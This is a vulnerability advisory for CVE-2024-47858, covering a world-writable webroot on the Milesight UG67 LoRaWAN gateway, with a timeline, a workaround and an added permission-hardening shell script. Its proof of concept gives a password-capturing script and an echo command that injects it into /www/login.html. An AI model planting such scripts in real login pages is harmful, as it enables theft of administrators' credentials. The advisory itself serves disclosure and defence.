Milesight UG67: World Writeable Webroot Allows for Privilege Escalation
Attackers with any user account on a Milesight UG67 LoRaWAN Gateway can gain full root access by manipulation of the webroot.
Details
- Product: Milesight UG67 Outdoor LoRaWAN Gateway
- Affected Versions: 60.0.0.42-r5, likely others
- Fixed Versions: 60.0.0.44
- Vulnerability Type: Local Privilege Escalation
- Security Risk: low
- Vendor URL: https://www.milesight.com/iot/product/lorawan-gateway/ug67
- Vendor Status: fixed version released
- Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-005
- Advisory Status: published
- CVE: CVE-2024-47858
- CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47858
Introduction
The Milesight UG67 is a robust outdoor LoRaWAN® gateway designed for outdoor deployments.
More Details
Attackers with access to any user account on a Milesight UG67 LoRaWAN Gateway can modify the source files of the web interface, which makes it possible to send all credentials entered via the web interface, including those of administrative accounts, to an attacker-controlled system.
Proof of Concept
Any user account with the ability to perform arbitrary commands on the gateway (see for example rt-sa-2024-003 on how to gain command execution via PostgreSQL) has read and write access to the webroot (located at /www/) of the web interface, since the corresponding source files are world-modifiable:
root@GATEWAY:/www# ps | grep uhttpd
3450 root 13892 S /sbin/uhttpd -f -w 1800 -h /www -r GATEWAY -x /cgi-bin -u /cgi -t 1800 -T 30 -k 20 -A 1 -n 3 -N 100 -D -R -p 127.0.0.1:17080 -p [::1]:17080 -C /etc/https.crt -K /etc/https.key -s 127.0.0.1:17443 -s [::1]:17443
root@GATEWAY:/www# ls -la
drwxr-xr-x 1 root root 4096 May 7 23:36 .
drwxr-xr-x 1 root root 4096 Apr 29 22:42 ..
drwxr-xr-x 1 root root 4096 May 7 23:21 cgi-bin
drwxrwxrwx 2 root root 374 Feb 19 20:37 css
drwxrwxrwx 3 root root 26 Feb 19 20:37 dist
-rw-rw-rw- 1 root root 1107 Feb 19 09:15 example.html
drwxrwxrwx 2 root root 1073 Feb 19 20:37 images
-rw-rw-rw- 1 root root 854674 Feb 19 09:15 index.html
-rw-rw-rw- 1 root root 8164 Feb 19 09:15 index_mobile.html
drwxrwxrwx 2 root root 743 Feb 19 20:37 js
drwxrwxrwx 2 root root 157 Feb 19 20:37 lang
drwxr-xr-x 1 root root 4096 May 7 21:45 log
-rw-rw-rw- 1 root root 272918 May 7 23:53 login.html
-rw-rw-rw- 1 root root 1719 Feb 19 09:15 login_mobile.html
drwxrwxrwx 11 root root 197 Feb 19 20:37 view
This enables attackers to modify the login page, for example by adding a script component that sends credentials to an attacker-controlled system. The following example was used as proof of concept:
<script>
pwdinput = document.getElementById("password");
pwdinput.addEventListener("change", (ev) => {
console.log("Password Input changed: ", pwdinput.value);
});
</script>
The following command edits the login page in-place and adds the script above. While this appends the script after the closing </html> tag, common browsers will still execute it:
echo '<script>pwdinput = document.getElementById("password");pwdinput.addEventListener("change", (ev) => { console.log("Password Input changed: ", pwdinput.value); });</script>' >> /www/login.html
As a consequence, all credentials entered into the web interface after compromise, including those of administrative accounts, can be collected by attackers.
Workaround
Manually change the file permissions of the HTML source files of the web interface to remove write-access for all users.
Fix
The default file permissions for the HTML source files of the web interface should be fixed to restrict access to only those accounts that actually require access.
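The following script implements the workaround above as an audit and remediation step. It is an added example, not part of the advisory or of the vendor's firmware; it assumes a POSIX/busybox sh with find and chmod, as present on the gateway, and that the webroot is /www as shown in the uhttpd command line.

```shell
#!/bin/sh
# Audit a webroot for files and directories that are writable by group or
# others (the condition that lets any shell user alter login.html), and
# optionally strip that write access. Busybox find/chmod compatible.
# Assumption: the webroot path defaults to /www (from the uhttpd -h flag).

WEBROOT="${WEBROOT:-/www}"

# Print every path under $1 whose group-write or other-write bit is set.
list_writable() {
    find "$1" \( -perm -020 -o -perm -002 \) -print 2>/dev/null
}

# Report the number of such paths; returns 0 when the tree is clean, 1 otherwise.
check_webroot() {
    n=$(list_writable "$1" | wc -l | tr -d ' ')
    echo "group/world-writable entries under $1: $n"
    [ "$n" -eq 0 ]
}

# Remove the group and other write bits from every offending path under $1,
# leaving owner (root) permissions untouched so uhttpd can still read them.
harden_webroot() {
    list_writable "$1" | while IFS= read -r p; do
        chmod go-w "$p" && echo "fixed: $p"
    done
}

# Usage: sh audit_webroot.sh check   (audit only)
#        sh audit_webroot.sh fix     (audit, remediate, audit again)
case "${1:-}" in
    check) check_webroot "$WEBROOT" ;;
    fix)   check_webroot "$WEBROOT"; harden_webroot "$WEBROOT"; check_webroot "$WEBROOT" ;;
esac
```

Run the check after firmware updates as well, since a new image may ship the original permissions again.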
Security Risk
Attackers who are able to execute arbitrary commands on a Milesight UG67 LoRaWAN Gateway can collect valid user credentials by modifying the webroot of the web interface. If the login details of an administrative user can be obtained, attackers can completely take over the device and extract all configured secrets.
Since all accounts except the root account only have a limited shell configured, which does not allow executing arbitrary commands, this attack requires another vulnerability (like rt-sa-2024-003) to gain shell access. The attack furthermore requires user interaction, since an administrative user has to authenticate to the web interface, or perform an equivalent action that results in observable ubus traffic, while the device is compromised. In combination, these vulnerabilities pose a medium risk.
Timeline
- 2024-04-25 Vulnerability identified
- 2024-04-29 Customer approved disclosure to vendor
- 2024-05-14 Vendor notified
- 2024-06-28 asked Vendor for update
- 2024-07-03 Vendor will provide Update until end of July
- 2024-07-24 asked Vendor for update
- 2024-07-30 Vendor stated: Work in Progress
- 2024-08-09 Vendor stated: Fix expected Q3/24
- 2024-09-24 CVE ID requested
- 2024-09-24 asked Vendor for update
- 2024-09-24 Vendor stated: Fix in 60.0.0.44
- 2024-10-04 CVE ID assigned
- 2024-10-07 asked Vendor for update
- 2024-10-08 Vendor stated: Fix will be available mid-October
- 2024-10-18 asked Vendor for update
- 2024-10-21 Vendor stated: Fix will be available mid-November
- 2024-11-04 Vendor released fixed version for testing
- 2024-11-05 Vendor released fixed version
- 2024-12-10 Customer approved public release of vulnerability details
- 2024-12-10 Advisory released
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. In these tests, security weaknesses in company networks or products are uncovered so that they can be fixed immediately.
As there are only a few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/